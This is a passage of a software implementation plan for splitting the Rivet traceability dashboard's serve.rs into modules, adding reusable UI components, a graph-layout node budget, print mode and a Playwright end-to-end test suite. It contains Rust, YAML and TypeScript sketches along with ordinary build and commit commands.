| **NEW** — CSS constant (~580 lines) | +| `etch/src/svg.rs` | MODIFY — dynamic buffer sizing | +| `etch/src/layout.rs` | MODIFY — add node budget / bail-out | +| `safety/stpa/hazards.yaml` | MODIFY — add H-13 (scalability hazard) | +| `safety/stpa/system-constraints.yaml` | MODIFY — add SC-15 (scalability constraint) | + +### Rationale: serve.rs split + +The current `serve.rs` is 7,576 lines — a single file with all routes, CSS, JS, and HTML generation. This plan splits it into a `serve/` module directory. Each view becomes its own file with clear ownership. The `components.rs` module is the key innovation: build filter bars, tables, tree views, and pagination helpers once, then call them from any view. + +**Migration strategy:** Each task extracts one view at a time. The old `serve.rs` shrinks incrementally. At each step, the dashboard remains fully functional. Final step deletes the empty `serve.rs`. + +--- + +## Task 0: STPA scalability coverage + +Add the hazard and constraint for "artifacts grow too large for the dashboard to handle efficiently." + +**Files:** +- Modify: `safety/stpa/hazards.yaml` +- Modify: `safety/stpa/system-constraints.yaml` +- Modify: `safety/stpa/ucas.yaml` +- Modify: `safety/stpa/controller-constraints.yaml` + +- [ ] **Step 1: Add H-13 hazard** + +```yaml + - id: H-13 + title: Rivet dashboard becomes unresponsive when artifact count exceeds layout engine capacity + description: > + When a project contains hundreds or thousands of artifacts, the graph + layout algorithm (O(N² log N) Sugiyama) exhausts memory or blocks the + async runtime, causing the dashboard to hang or crash. Engineers lose + the ability to visualize and navigate traceability, defeating the + tool's purpose. 
+ losses: [L-4, L-5] +``` + +- [ ] **Step 2: Add SC-15 constraint** + +```yaml + - id: SC-15 + title: Dashboard must degrade gracefully when artifact count exceeds rendering thresholds + description: > + The dashboard must impose node budgets on graph layout, paginate + large artifact lists, and progressively disclose detail rather than + attempting to render everything at once. Layout computation must run + outside the async runtime to prevent blocking other requests. + hazards: [H-13] + spec-baseline: "v0.2.0" +``` + +- [ ] **Step 3: Add UCA and CC for dashboard controller** + +Add UCA-D-3 and CC-D-3 to the `dashboard-ucas:` section of `ucas.yaml` (where `UCA-D-1` and `UCA-D-2` already exist): + +```yaml +# In ucas.yaml, dashboard-ucas section: + - id: UCA-D-3 + title: Dashboard provides full unfiltered graph when artifact count exceeds layout budget + uca-type: providing + context: > + Project contains 500+ artifacts and user navigates to /graph without type filters or focus. + controller: CTRL-DASH + hazards: [H-13] + +# In controller-constraints.yaml: + - id: CC-D-3 + constraint: > + Dashboard must enforce a node budget on graph layout, display a helpful + message when exceeded, and provide filter/focus controls to narrow the view. + Layout computation must run in spawn_blocking to avoid blocking the async runtime. + controller: CTRL-DASH + ucas: [UCA-D-3] + hazards: [H-13] +``` + +- [ ] **Step 4: Validate** + +Run: `cargo run --release -- validate` +Expected: PASS (0 warnings) + +- [ ] **Step 5: Commit** + +``` +git add safety/stpa/ +git commit -m "stpa: add H-13/SC-15 scalability hazard for dashboard rendering + +Refs: H-13" +``` + +--- + +## Task 1: Create serve/ module skeleton and extract layout + +Extract `page_layout()`, CSS, and the print layout into the new module structure. This is the foundation everything else builds on. 
+ +**Files:** +- Create: `rivet-cli/src/serve/mod.rs` +- Create: `rivet-cli/src/serve/layout.rs` +- Create: `rivet-cli/src/serve/js.rs` +- Modify: `rivet-cli/src/main.rs` (change `mod serve` to `mod serve` pointing at directory) + +- [ ] **Step 1: Create serve/mod.rs with AppState and router** + +Move `AppState`, `SharedState`, `RepoContext`, `GitInfo`, `SiblingProject` structs and the `pub async fn run()` function (line 272 of serve.rs). Keep the router definition here. Import view handlers from submodules (initially re-export from old serve.rs via `#[path]`). Also move utility routes that don't belong to a specific view: `/source-raw/{*path}`, `/api/links/{id}`, `/wasm/{*path}`, `/docs-asset/{*path}`, `/reload`. + +- [ ] **Step 2: Create serve/layout.rs with page_layout and print_layout** + +Extract `page_layout()` from serve.rs (lines 2372-2566). Add a new `print_layout()` that renders the same content but without nav, context bar, or sidebar — just the content area with print-friendly CSS. + +The print layout key: check for `?print=1` query param. If present, return content wrapped in minimal `<html>` with `@media print` CSS, no nav, no HTMX. + +```rust +pub fn page_layout(content: &str, state: &AppState, print: bool) -> Html<String> { + if print { + return print_layout(content, state); + } + // ... 
existing layout logic
+}
+
+fn print_layout(content: &str, state: &AppState) -> Html<String> {
+    Html(format!(r##"<!DOCTYPE html>
+<html lang="en">
+<head>
+<meta charset="utf-8">
+<title>{project} — Rivet</title>
+<style>@media print {{ body {{ font-size: 12pt; }} nav {{ display: none; }} }}</style>
+</head>
+<body>
+{content}
+</body>
+</html>"##,
+    project = html_escape(&state.context.project_name),
+    ))
+}
+```
+
+- [ ] **Step 3: Create serve/js.rs and serve/styles.rs**
+
+Extract **all** JavaScript constants from serve.rs into `js.rs`:
+- Main JS block (~430 lines, lines 1339-1767): `pub const JS: &str`
+- Search JS (~108 lines, starting line 1772): `pub const SEARCH_JS: &str`
+- AADL JS (starting line 1880): `pub const AADL_JS: &str`
+
+Extract the CSS constant (~580 lines, lines 755-1335) into `styles.rs`:
+- `pub const CSS: &str`
+
+All three JS constants are referenced in `page_layout()` via `{JS}`, `{SEARCH_JS}`, `{AADL_JS}` — ensure the imports match.
+
+- [ ] **Step 4: Update main.rs**
+
+Change `mod serve;` to point at the new directory module. Verify `rivet serve` still starts and all routes respond.
+
+- [ ] **Step 5: Test manually**
+
+Run: `cargo run --release -- serve`
+Visit: `http://localhost:3000/`, `/artifacts`, `/stpa`, `/graph`
+Expected: All pages render identically to before.
+
+- [ ] **Step 6: Commit**
+
+```
+git add rivet-cli/src/serve/ rivet-cli/src/main.rs
+git commit -m "refactor: extract serve.rs into serve/ module directory
+
+Implements: FEAT-052
+Refs: DD-005"
+```
+
+---
+
+## Task 2: Build the component kit (components.rs)
+
+This is the core deliverable. Build reusable HTML component functions that every view will use.
+
+**Files:**
+- Create: `rivet-cli/src/serve/components.rs`
+
+### Component 1: FilterBar
+
+A horizontal bar with type checkboxes, status dropdown, tag filter, and text search. All selections are reflected in query params so the URL is bookmarkable and survives reload.
+
+- [ ] **Step 1: Write FilterBar component**
+
+```rust
+/// Render a filter bar that preserves state in URL query params.
+///
+/// `active_filters` is the current state parsed from the request.
+/// `base_url` is the route path (e.g., "/artifacts", "/stpa").
+/// Each filter change triggers an HTMX GET to `base_url?{new_params}`.
+pub fn filter_bar(cfg: &FilterBarConfig) -> String {
+    // Renders:
+    // - Type checkboxes (from cfg.available_types)
+    // - Status dropdown (from cfg.available_statuses)
+    // - Tag pills (from cfg.available_tags)
+    // - Free-text search input
+    // - Clear all button
+    // All wired with onchange -> update URL params and hx-get
+}
+
+pub struct FilterBarConfig {
+    pub base_url: String,
+    pub available_types: Vec<String>,
+    pub available_statuses: Vec<String>,
+    pub available_tags: Vec<String>,
+    pub active_types: Vec<String>,
+    pub active_statuses: Vec<String>,
+    pub active_tags: Vec<String>,
+    pub search_text: String,
+    pub extra_params: Vec<(String, String)>, // preserve non-filter params
+}
+```
+
+- [ ] **Step 2: Write SortableTable component**
+
+```rust
+/// Render a sortable HTML table with column headers that toggle sort direction.
+/// Sort state is encoded in `?sort=col&dir=asc` query params.
+pub fn sortable_table(cfg: &TableConfig) -> String { ... }
+
+pub struct TableConfig {
+    pub base_url: String,
+    pub columns: Vec<String>,
+    pub rows: Vec<Vec<String>>, // each inner vec = one row's cells (HTML)
+    pub sort_column: Option<String>,
+    pub sort_dir: SortDir,
+    pub extra_params: Vec<(String, String)>,
+}
+```
+
+- [ ] **Step 3: Write CollapsibleTree component**
+
+```rust
+/// Render a hierarchical tree with <details>/<summary> elements.
+/// Fold/unfold state is encoded in `?open=id1,id2,id3` query param.
+/// Provides "Expand All" / "Collapse All" buttons that update the URL.
+pub fn collapsible_tree(nodes: &[TreeNode], open_ids: &[String], base_url: &str) -> String { ... }
+
+pub struct TreeNode {
+    pub id: String,
+    pub summary_html: String,
+    pub detail_html: String,
+    pub children: Vec<TreeNode>,
+}
+```
+
+- [ ] **Step 4: Write Pagination component**
+
+```rust
+/// Render pagination controls: « ‹ page N of M › »
+/// Page state encoded in `?page=N&per_page=M` query params.
+pub fn pagination(page: usize, per_page: usize, total: usize, base_url: &str, extra_params: &[(String, String)]) -> String { ... }
+```
+
+- [ ] **Step 5: Write unit tests**
+
+```rust
+#[cfg(test)]
+mod tests {
+    #[test]
+    fn filter_bar_renders_checkboxes() { ... }
+    #[test]
+    fn filter_bar_preserves_extra_params() { ... }
+    #[test]
+    fn sortable_table_toggle_direction() { ... }
+    #[test]
+    fn collapsible_tree_open_ids() { ... }
+    #[test]
+    fn pagination_boundaries() { ... }
+}
+```
+
+Run: `cargo test -p rivet-cli`
+Expected: All new tests pass.
+
+- [ ] **Step 6: Commit**
+
+```
+git add rivet-cli/src/serve/components.rs
+git commit -m "feat(serve): add reusable UI component kit — filter bar, sortable table, collapsible tree, pagination
+
+Implements: FEAT-052
+Refs: SC-15"
+```
+
+---
+
+## Task 3: URL-persisted view state middleware
+
+Add a shared query param struct and middleware that every view can use.
+
+**Files:**
+- Modify: `rivet-cli/src/serve/mod.rs`
+
+- [ ] **Step 1: Define ViewParams extractor**
+
+```rust
+/// Common query params shared across all views.
+/// Views add their own params on top of this.

+#[derive(Debug, Deserialize, Default)]
+pub struct ViewParams {
+    #[serde(default)]
+    pub types: Option<String>,
+    #[serde(default)]
+    pub status: Option<String>,
+    #[serde(default)]
+    pub tags: Option<String>,
+    #[serde(default)]
+    pub q: Option<String>,
+    #[serde(default)]
+    pub sort: Option<String>,
+    #[serde(default)]
+    pub dir: Option<String>,
+    #[serde(default)]
+    pub page: Option<usize>,
+    #[serde(default)]
+    pub per_page: Option<usize>,
+    #[serde(default)]
+    pub open: Option<String>, // comma-separated open node IDs
+    #[serde(default)]
+    pub print: Option<u8>, // print mode
+}
+```
+
+- [ ] **Step 2: Add helper to rebuild URL with current params**
+
+```rust
+impl ViewParams {
+    /// Build query string from current params, allowing overrides.
+    pub fn to_query_string(&self, overrides: &[(&str, &str)]) -> String { ... }
+}
+```
+
+- [ ] **Step 3: Commit**
+
+```
+git add rivet-cli/src/serve/mod.rs
+git commit -m "feat(serve): add ViewParams extractor for URL-persisted filter/sort/page state
+
+Refs: DD-005"
+```
+
+---
+
+## Task 4: Fix graph scalability
+
+Fix the three critical graph issues: blocking tokio, O(N²) on large graphs, and SVG buffer sizing.
+
+**Files:**
+- Modify: `rivet-cli/src/serve/views/graph.rs` (or serve.rs until split)
+- Modify: `etch/src/layout.rs`
+- Modify: `etch/src/svg.rs`
+
+- [ ] **Step 1: Write failing test for large graph layout**
+
+Note: `NodeInfo` does not derive `Default`. Construct it explicitly.
+ +```rust +// etch/src/layout.rs +#[test] +fn layout_500_nodes_completes() { + use petgraph::Graph; + let mut g = Graph::new(); + let nodes: Vec<_> = (0..500).map(|i| g.add_node(format!("N-{i}"))).collect(); + // Chain edges: 0→1→2→...→499 + for w in nodes.windows(2) { + g.add_edge(w[0], w[1], "link".to_string()); + } + let layout = layout( + &g, + &|_, n| NodeInfo { + id: n.clone(), + label: n.clone(), + node_type: String::new(), + sublabel: None, + parent: None, + }, + &|_, e| EdgeInfo { label: e.clone() }, + &LayoutOptions::default(), + ); + assert_eq!(layout.nodes.len(), 500); +} +``` + +Run: `cargo test -p etch layout_500` +Expected: PASS (but may be slow — establishes baseline) + +- [ ] **Step 2: Add node budget to etch layout** + +Add a `max_nodes: Option` field to `LayoutOptions`. When set, if `graph.node_count() > max_nodes`, return a `GraphLayout` with a single sentinel node saying "Graph too large ({n} nodes). Use filters or focus to narrow the view." This prevents the O(N²) blowup. + +```rust +// In layout(): +if let Some(max) = options.max_nodes { + if graph.node_count() > max { + return GraphLayout { + nodes: vec![LayoutNode { + id: "__budget_exceeded__".into(), + label: format!("Graph has {} nodes (budget: {}). Use type filters or focus on a specific artifact.", graph.node_count(), max), + ..Default::default() + }], + edges: vec![], + width: 400.0, + height: 60.0, + }; + } +} +``` + +- [ ] **Step 3: Fix SVG buffer sizing** + +In `etch/src/svg.rs`, replace the fixed 4096-byte capacity with a dynamic estimate: + +```rust +// Estimate ~500 bytes per node + ~200 bytes per edge + base overhead +let estimated = 2048 + layout.nodes.len() * 500 + layout.edges.len() * 200; +let mut svg = String::with_capacity(estimated); +``` + +- [ ] **Step 4: Move graph layout to spawn_blocking** + +In the graph view handler, wrap the layout + SVG render in `tokio::task::spawn_blocking` so it doesn't block the async runtime. 

+**IMPORTANT:** `spawn_blocking` requires `Send + 'static` — you cannot capture borrowed references from the `RwLock` read guard. Pre-collect all node/edge info into owned collections BEFORE entering the blocking task:
+
+```rust
+// Pre-collect owned data while we hold the read lock
+let node_infos: HashMap<NodeIndex, NodeInfo> = sub.node_indices()
+    .map(|idx| {
+        let id = sub[idx].clone();
+        let atype = store.get(&id).map(|a| a.artifact_type.clone()).unwrap_or_default();
+        let title = store.get(&id).map(|a| a.title.clone()).unwrap_or_default();
+        let sublabel = if title.len() > 28 { Some(format!("{}...", &title[..26])) }
+                       else if title.is_empty() { None }
+                       else { Some(title) };
+        (idx, NodeInfo { id, label: sub[idx].clone(), node_type: atype, sublabel, parent: None })
+    })
+    .collect();
+
+let edge_infos: HashMap<EdgeIndex, EdgeInfo> = sub.edge_indices()
+    .map(|idx| (idx, EdgeInfo { label: sub[idx].clone() }))
+    .collect();
+
+// Drop the read lock, then spawn blocking with owned data
+let svg = tokio::task::spawn_blocking(move || {
+    let gl = etch::layout(&sub, &|idx, _| node_infos[&idx].clone(),
+                          &|idx, _| edge_infos[&idx].clone(), &layout_opts);
+    etch::svg::render_svg(&gl, &svg_opts)
+}).await.unwrap();
+```
+
+- [ ] **Step 5: Set default node budget in graph route**
+
+In the graph view handler, set `max_nodes: Some(300)` by default. Add a `?budget=N` query param to override (capped at 1000).
+
+- [ ] **Step 6: Run tests**
+
+Run: `cargo test --all`
+Expected: All tests pass, including the new 500-node test.
+
+- [ ] **Step 7: Commit**
+
+```
+git add etch/src/layout.rs etch/src/svg.rs rivet-cli/src/serve/
+git commit -m "fix(serve/etch): graph scalability — spawn_blocking, node budget, dynamic SVG buffer
+
+Fixes: H-13
+Implements: SC-15"
+```
+
+---
+
+## Task 5: Extract and enhance STPA view
+
+Move STPA view to its own file with the new component kit: filter bar, fold/unfold with URL state, link chain drill-down.
+ +**Files:** +- Create: `rivet-cli/src/serve/views/stpa.rs` + +- [ ] **Step 1: Extract stpa_view from serve.rs** + +Move `stpa_view()` / `stpa_partial()` (lines 4654-5016) into `views/stpa.rs`. Wire up in `mod.rs` router. Verify it still renders. + +- [ ] **Step 2: Add FilterBar to STPA view** + +Add a filter bar at the top with: +- Type checkboxes: loss, hazard, sub-hazard, system-constraint, controller, uca, controller-constraint, loss-scenario +- Severity filter (for hazards) +- UCA-type filter (not-providing, providing, too-early-too-late, stopped-too-soon) +- Text search across titles and descriptions + +All filter state in URL: `/stpa?types=hazard,uca&uca_type=not-providing&q=firmware` + +- [ ] **Step 3: Add URL-persisted fold/unfold state** + +Replace the current hardcoded `
` with the `collapsible_tree` component. Each node's open/closed state is tracked in `?open=H-1,H-2,SC-3`. + +Add "Expand All" / "Collapse All" buttons that update the URL and re-render via HTMX. + +- [ ] **Step 4: Add link chain drill-down** + +When clicking a linked artifact in the STPA tree (e.g., a hazard's linked losses, or a UCA's linked controller), show an inline expandable panel with the target artifact's details. Use HTMX `hx-get="/artifacts/{id}/preview"` lazy loading. + +- [ ] **Step 5: Test manually** + +Run: `cargo run --release -- serve` +Visit: `http://localhost:3000/stpa?types=uca&uca_type=not-providing&open=H-1` +Expected: Filtered to UCAs of type "not-providing", H-1 tree expanded, URL preserved on reload. + +- [ ] **Step 6: Commit** + +``` +git add rivet-cli/src/serve/views/stpa.rs rivet-cli/src/serve/mod.rs +git commit -m "feat(serve): rich STPA view with filter bar, URL-persisted fold/unfold, link drill-down + +Implements: FEAT-052 +Refs: REQ-002" +``` + +--- + +## Task 6: Extract and enhance artifacts view + +**Files:** +- Create: `rivet-cli/src/serve/views/artifacts.rs` + +- [ ] **Step 1: Extract artifacts_list and artifact_detail** + +- [ ] **Step 2: Replace inline filterTable() with FilterBar component** + +Add server-side filtering with URL params: `/artifacts?types=requirement&status=approved&sort=id&dir=asc&page=2` + +- [ ] **Step 3: Add SortableTable for artifact list** + +Clickable column headers for ID, Type, Title, Status. Sort state in URL. + +- [ ] **Step 4: Add pagination** + +Default 50 per page. Page state in URL: `?page=2&per_page=50`. + +- [ ] **Step 5: Commit** + +``` +git commit -m "feat(serve): enhanced artifacts view with server-side filter/sort/pagination + +Refs: DD-005" +``` + +--- + +## Task 7: Extract and enhance remaining views + +Apply the component kit to traceability, validation, matrix, documents, and other views. Each gets its own file with filter/sort/URL state. 
+ +**Files:** +- Create remaining `views/*.rs` files + +- [ ] **Step 1: Extract traceability view** — add filter bar, fold/unfold tree with URL state +- [ ] **Step 2: Extract validation view** — add severity filter, sort by type/ID +- [ ] **Step 3: Extract matrix view** — preserve from/to/link params in URL +- [ ] **Step 4: Extract documents view** — add `?print=1` support for clean printable output +- [ ] **Step 5: Extract remaining views** (source, search, results, diff, doc-linkage, help) +- [ ] **Step 6: Delete old serve.rs** once all handlers are extracted + +- [ ] **Step 7: Commit per extraction** (one commit per view or per logical group) + +--- + +## Task 8: Print mode + +Add `?print=1` query param support to all views for clean printable output. + +**Files:** +- Modify: `rivet-cli/src/serve/layout.rs` +- Modify: `rivet-cli/src/serve/mod.rs` (middleware) + +- [ ] **Step 1: Add print detection to page_layout** + +Check for `?print=1` in every response. If present, use `print_layout()` instead of `page_layout()`. The print layout strips: nav bar, context bar, sidebar, HTMX scripts, interactive controls. + +- [ ] **Step 2: Add print CSS** + +```css +@media print { + .nav, .context-bar, .filter-bar, .pagination { display: none; } + body { margin: 0; font-size: 11pt; } + a { color: inherit; text-decoration: none; } + table { page-break-inside: auto; } + tr { page-break-inside: avoid; } +} +``` + +- [ ] **Step 3: Add "Print" button to page layout** + +Small button in the context bar that opens current URL + `?print=1` in a new tab. + +- [ ] **Step 4: Test** + +Visit: `http://localhost:3000/stpa?print=1` +Expected: Clean page without nav/sidebar, suitable for Cmd+P printing. 
+ +- [ ] **Step 5: Commit** + +``` +git commit -m "feat(serve): add ?print=1 mode for clean printable views + +Refs: DD-005" +``` + +--- + +## Task 9: Playwright E2E test suite + +Comprehensive browser-based testing for every dashboard view, component interaction, URL state persistence, print mode, and graph scalability. + +**Files:** +- Create: `tests/playwright/playwright.config.ts` +- Create: `tests/playwright/package.json` +- Create: `tests/playwright/helpers.ts` +- Create: `tests/playwright/navigation.spec.ts` +- Create: `tests/playwright/artifacts.spec.ts` +- Create: `tests/playwright/stpa.spec.ts` +- Create: `tests/playwright/graph.spec.ts` +- Create: `tests/playwright/filter-sort.spec.ts` +- Create: `tests/playwright/print-mode.spec.ts` +- Create: `tests/playwright/url-state.spec.ts` +- Create: `tests/playwright/traceability.spec.ts` +- Create: `tests/playwright/documents.spec.ts` +- Create: `tests/playwright/search.spec.ts` +- Create: `tests/playwright/matrix.spec.ts` +- Create: `tests/playwright/validation.spec.ts` +- Create: `tests/playwright/accessibility.spec.ts` +- Modify: `.github/workflows/ci.yml` — add Playwright CI job + +### Setup + +- [ ] **Step 1: Create Playwright project** + +```json +// tests/playwright/package.json +{ + "name": "rivet-playwright", + "private": true, + "devDependencies": { + "@playwright/test": "^1.50.0" + }, + "scripts": { + "test": "playwright test", + "test:headed": "playwright test --headed", + "test:ui": "playwright test --ui" + } +} +``` + +```typescript +// tests/playwright/playwright.config.ts +import { defineConfig } from '@playwright/test'; + +export default defineConfig({ + testDir: '.', + timeout: 30_000, + retries: 1, + use: { + baseURL: 'http://localhost:3000', + trace: 'on-first-retry', + screenshot: 'only-on-failure', + }, + webServer: { + command: 'cargo run --release -- serve --port 3000', + port: 3000, + timeout: 120_000, + reuseExistingServer: !process.env.CI, + cwd: '../..', + }, + projects: [ + { name: 
'chromium', use: { browserName: 'chromium' } },
+ ],
+});
+```
+
+- [ ] **Step 2: Create test helpers**
+
+```typescript
+// tests/playwright/helpers.ts
+import { Page, expect } from '@playwright/test';
+
+/** Wait for HTMX to finish all pending requests */
+export async function waitForHtmx(page: Page) {
+ await page.waitForFunction(() => {
+ // @ts-ignore
+ return !document.querySelector('.htmx-request');
+ }, { timeout: 10_000 });
+}
+
+/** Navigate via HTMX (click nav link) and wait for content swap */
+export async function htmxNavigate(page: Page, linkText: string) {
+ await page.click(`a:has-text("${linkText}")`);
+ await waitForHtmx(page);
+}
+
+/** Assert current URL contains expected path and params */
+export async function assertUrl(page: Page, path: string, params?: Record<string, string>) {
+ const url = new URL(page.url());
+ expect(url.pathname).toBe(path);
+ if (params) {
+ for (const [key, value] of Object.entries(params)) {
+ expect(url.searchParams.get(key)).toBe(value);
+ }
+ }
+}
+
+/** Count visible rows in an artifact table */
+export async function countTableRows(page: Page) {
+ return page.locator('table tbody tr').count();
+}
+```
+
+- [ ] **Step 3: Install and verify**
+
+```bash
+cd tests/playwright && npm install && npx playwright install chromium
+```
+
+Run: `cd tests/playwright && npx playwright test --list`
+Expected: Lists all test files (initially empty specs)
+
+### Core navigation tests
+
+- [ ] **Step 4: Write navigation.spec.ts**
+
+```typescript
+import { test, expect } from '@playwright/test';
+import { waitForHtmx, assertUrl } from './helpers';
+
+test.describe('Navigation', () => {
+ test('dashboard loads with project name in header', async ({ page }) => {
+ await page.goto('/');
+ await expect(page.locator('.ctx-project')).toHaveText('rivet');
+ });
+
+ test('all nav links are reachable', async ({ page }) => {
+ await page.goto('/');
+ const navLinks = [
+ { text: 'Dashboard', path: '/' },
+ { text: 'Artifacts', path: '/artifacts' },
+ 
{ text: 'Validate', path: '/validate' }, + { text: 'Matrix', path: '/matrix' }, + { text: 'Graph', path: '/graph' }, + { text: 'Coverage', path: '/coverage' }, + ]; + for (const link of navLinks) { + await page.click(`a:has-text("${link.text}")`); + await waitForHtmx(page); + // HTMX updates URL via hx-push-url + await expect(page).toHaveURL(new RegExp(link.path)); + } + }); + + test('direct URL access works (no redirect loop)', async ({ page }) => { + await page.goto('/artifacts'); + await expect(page.locator('table')).toBeVisible(); + await page.goto('/stpa'); + await expect(page.locator('h2')).toContainText(/STPA/i); + }); + + test('browser back/forward preserves state', async ({ page }) => { + await page.goto('/'); + await page.click('a:has-text("Artifacts")'); + await waitForHtmx(page); + await page.click('a:has-text("Graph")'); + await waitForHtmx(page); + await page.goBack(); + await expect(page).toHaveURL(/artifacts/); + await page.goForward(); + await expect(page).toHaveURL(/graph/); + }); + + test('reload button refreshes data', async ({ page }) => { + await page.goto('/'); + const reloadBtn = page.locator('button:has-text("Reload")'); + await expect(reloadBtn).toBeVisible(); + await reloadBtn.click(); + await waitForHtmx(page); + // Page should still be functional after reload + await expect(page.locator('.ctx-project')).toHaveText('rivet'); + }); +}); +``` + +### Artifact tests + +- [ ] **Step 5: Write artifacts.spec.ts** + +```typescript +import { test, expect } from '@playwright/test'; +import { waitForHtmx, assertUrl, countTableRows } from './helpers'; + +test.describe('Artifacts', () => { + test('artifact list shows all artifacts', async ({ page }) => { + await page.goto('/artifacts'); + const rows = await countTableRows(page); + expect(rows).toBeGreaterThan(300); // 328 artifacts expected + }); + + test('artifact detail shows links and backlinks', async ({ page }) => { + await page.goto('/artifacts/REQ-001'); + await 
expect(page.locator('h2')).toContainText('REQ-001'); + // Should show outgoing and incoming links sections + await expect(page.locator('text=satisfied-by')).toBeVisible(); + }); + + test('artifact hover preview loads', async ({ page }) => { + await page.goto('/artifacts'); + // Hover over first artifact link + const firstLink = page.locator('a[href*="/artifacts/"]').first(); + await firstLink.hover(); + // Preview tooltip should appear (loaded via /artifacts/{id}/preview) + await expect(page.locator('.hover-card, .tooltip, [data-preview]')).toBeVisible({ timeout: 5000 }); + }); + + test('filter by type via URL params', async ({ page }) => { + await page.goto('/artifacts?types=requirement'); + await waitForHtmx(page); + const rows = await countTableRows(page); + expect(rows).toBe(31); // 31 requirements + // All visible rows should be requirements + const types = await page.locator('table tbody tr td:nth-child(2)').allTextContents(); + for (const t of types) { + expect(t.trim().toLowerCase()).toContain('requirement'); + } + }); + + test('sort by column via URL params', async ({ page }) => { + await page.goto('/artifacts?sort=id&dir=desc'); + await waitForHtmx(page); + const firstId = await page.locator('table tbody tr:first-child td:first-child').textContent(); + const lastId = await page.locator('table tbody tr:last-child td:first-child').textContent(); + // Descending sort: first ID should be "later" alphabetically + expect(firstId!.localeCompare(lastId!)).toBeGreaterThan(0); + }); + + test('pagination works', async ({ page }) => { + await page.goto('/artifacts?page=1&per_page=20'); + const rows = await countTableRows(page); + expect(rows).toBeLessThanOrEqual(20); + // Pagination controls should be visible + await expect(page.locator('.pagination, [data-pagination]')).toBeVisible(); + }); +}); +``` + +### STPA tests + +- [ ] **Step 6: Write stpa.spec.ts** + +```typescript +import { test, expect } from '@playwright/test'; +import { waitForHtmx } from './helpers'; + 
+test.describe('STPA View', () => { + test('STPA page shows all artifact type counts', async ({ page }) => { + await page.goto('/stpa'); + // Summary cards should show counts + await expect(page.locator('text=loss')).toBeVisible(); + await expect(page.locator('text=hazard')).toBeVisible(); + await expect(page.locator('text=uca')).toBeVisible(); + }); + + test('hierarchical tree is expandable', async ({ page }) => { + await page.goto('/stpa'); + // Find a
element and toggle it + const details = page.locator('details').first(); + const wasOpen = await details.getAttribute('open'); + await details.locator('summary').click(); + const isOpen = await details.getAttribute('open'); + expect(isOpen !== wasOpen).toBeTruthy(); + }); + + test('expand all / collapse all buttons work', async ({ page }) => { + await page.goto('/stpa'); + // Click "Expand All" + const expandBtn = page.locator('button:has-text("Expand"), button:has-text("expand")'); + if (await expandBtn.isVisible()) { + await expandBtn.click(); + await waitForHtmx(page); + // All details should be open + const closedDetails = await page.locator('details:not([open])').count(); + expect(closedDetails).toBe(0); + } + }); + + test('UCA table shows all UCA types', async ({ page }) => { + await page.goto('/stpa'); + await expect(page.locator('text=not-providing')).toBeVisible(); + await expect(page.locator('text=providing')).toBeVisible(); + }); + + test('filter by type via URL preserves on reload', async ({ page }) => { + await page.goto('/stpa?types=uca'); + await waitForHtmx(page); + // Reload the page + await page.reload(); + // Filter should still be active + await expect(page).toHaveURL(/types=uca/); + }); + + test('fold/unfold state persists in URL', async ({ page }) => { + await page.goto('/stpa?open=H-1,H-2'); + await waitForHtmx(page); + // H-1 and H-2 sections should be open + const h1Details = page.locator('details:has(summary:has-text("H-1"))'); + if (await h1Details.isVisible()) { + await expect(h1Details).toHaveAttribute('open', ''); + } + }); +}); +``` + +### Graph tests + +- [ ] **Step 7: Write graph.spec.ts** + +```typescript +import { test, expect } from '@playwright/test'; +import { waitForHtmx } from './helpers'; + +test.describe('Graph View', () => { + test('graph renders SVG with nodes', async ({ page }) => { + await page.goto('/graph?types=requirement&depth=2'); + await waitForHtmx(page); + const svg = page.locator('svg'); + await 
expect(svg).toBeVisible({ timeout: 15_000 }); + // Should have at least some nodes + const nodes = await svg.locator('[data-id]').count(); + expect(nodes).toBeGreaterThan(0); + }); + + test('focus on specific artifact', async ({ page }) => { + await page.goto('/graph?focus=REQ-001&depth=2'); + await waitForHtmx(page); + const svg = page.locator('svg'); + await expect(svg).toBeVisible({ timeout: 15_000 }); + // REQ-001 node should be highlighted + await expect(svg.locator('[data-id="REQ-001"]')).toBeVisible(); + }); + + test('graph zoom controls work', async ({ page }) => { + await page.goto('/graph?types=requirement'); + await waitForHtmx(page); + const svg = page.locator('svg'); + await expect(svg).toBeVisible({ timeout: 15_000 }); + const viewBoxBefore = await svg.getAttribute('viewBox'); + // Click zoom in button + const zoomIn = page.locator('button:has-text("+")'); + if (await zoomIn.isVisible()) { + await zoomIn.click(); + // viewBox should change after zoom + } + }); + + test('node budget prevents crash on large graph', async ({ page }) => { + // Full unfiltered graph should either render with budget or show message + await page.goto('/graph'); + await waitForHtmx(page); + // Should not timeout — either SVG renders or budget message shows + const svgOrMessage = page.locator('svg, .budget-exceeded, text:has-text("budget")'); + await expect(svgOrMessage.first()).toBeVisible({ timeout: 30_000 }); + }); + + test('graph type filter checkboxes work', async ({ page }) => { + await page.goto('/graph'); + // Check a type filter checkbox + const checkbox = page.locator('input[type="checkbox"][value="requirement"]'); + if (await checkbox.isVisible()) { + await checkbox.check(); + await waitForHtmx(page); + await expect(page).toHaveURL(/types=.*requirement/); + } + }); + + test('clicking graph node navigates to artifact', async ({ page }) => { + await page.goto('/graph?focus=REQ-001&depth=1'); + await waitForHtmx(page); + const svg = page.locator('svg'); + await 
expect(svg).toBeVisible({ timeout: 15_000 }); + // Click on a node link in the SVG + const nodeLink = svg.locator('a[href*="/artifacts/"]').first(); + if (await nodeLink.isVisible()) { + await nodeLink.click(); + await expect(page).toHaveURL(/\/artifacts\//); + } + }); +}); +``` + +### Filter/sort component tests + +- [ ] **Step 8: Write filter-sort.spec.ts** + +```typescript +import { test, expect } from '@playwright/test'; +import { waitForHtmx } from './helpers'; + +test.describe('Filter and Sort Components', () => { + test('filter bar type checkboxes update URL', async ({ page }) => { + await page.goto('/artifacts'); + const filterCheckbox = page.locator('.filter-bar input[type="checkbox"]').first(); + if (await filterCheckbox.isVisible()) { + const value = await filterCheckbox.getAttribute('value'); + await filterCheckbox.check(); + await waitForHtmx(page); + await expect(page).toHaveURL(new RegExp(`types=.*${value}`)); + } + }); + + test('sort column headers toggle direction', async ({ page }) => { + await page.goto('/artifacts'); + const sortHeader = page.locator('th[data-sort], th a[href*="sort="]').first(); + if (await sortHeader.isVisible()) { + await sortHeader.click(); + await waitForHtmx(page); + await expect(page).toHaveURL(/sort=/); + // Click again to reverse + await sortHeader.click(); + await waitForHtmx(page); + await expect(page).toHaveURL(/dir=(asc|desc)/); + } + }); + + test('text search filters in real-time', async ({ page }) => { + await page.goto('/artifacts'); + const searchInput = page.locator('input[name="q"], input[type="search"]'); + if (await searchInput.isVisible()) { + await searchInput.fill('OSLC'); + // Wait for 